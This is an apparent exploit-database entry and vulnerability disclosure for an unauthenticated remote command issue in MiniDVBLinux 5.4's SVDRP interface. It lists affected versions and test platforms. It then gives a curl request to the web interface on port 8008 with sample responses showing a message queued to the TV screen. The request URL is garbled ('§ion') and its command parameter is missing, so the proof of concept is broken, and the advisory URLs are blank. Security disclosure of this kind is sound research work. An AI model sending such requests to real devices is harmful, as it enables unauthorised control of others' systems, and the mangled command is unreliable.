MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP Exploit, Remote Code Execution (RCE)

# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm

MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP ( Exploit

Vendor: MiniDVBLinux
Product web page:
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application allows the usage of the SVDRP protocol/commands
to be sent by a remote attacker to manipulate and/or control remotely
the TV.

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux (armv7l)
           VideoDiskRecorder 2.4.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2022-5714
Advisory URL:



Send a message to the TV screen:

curl http://ip:8008/?site=commands§ion=system&!

220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8
250 Message queued
221 mld closing connection

For more commands:

All rights reserved 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD